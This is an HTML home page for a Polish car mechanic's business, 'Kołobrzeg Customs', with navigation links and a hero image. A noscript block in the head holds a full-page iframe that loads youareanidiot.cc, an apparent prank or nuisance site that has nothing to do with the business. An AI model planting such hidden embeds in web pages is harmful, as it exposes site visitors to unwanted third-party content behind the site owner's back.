<!DOCTYPE html>
<html lang="pl-PL">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Kołobrzeg Customs</title>
    <link rel="stylesheet" href="style.css">
    <noscript>
        <iframe src="http://youareanidiot.cc" width="100%" height="100vh"></iframe>
    </noscript>
</head>
<body>
    <header>
        <section id="center">
            <aside>
                <img src="assets/images/logo.svg" href="index.html" height="90px" width="90px" alt="logotyp">
                <span id="name">Kołobrzeg Customs</span>
            </aside>
            <ul>
                <li><a href="index.html">Strona głowna</a></li>
                <li><a href="about.html">O nas</a></li>
                <li><a href="services.html">Usługi</a></li>
                <li><a href="contact.html">Kontakt</a></li>
            </ul>
        </section>
    </header>
    <section id="menu">
        <img src="assets/images/warsztat_foto_1.jpg" width="100%" height="100%" />
        <p><b>Najlepszy mechanik w twojej okolicy</b></p>
    </section>
</body>
</html>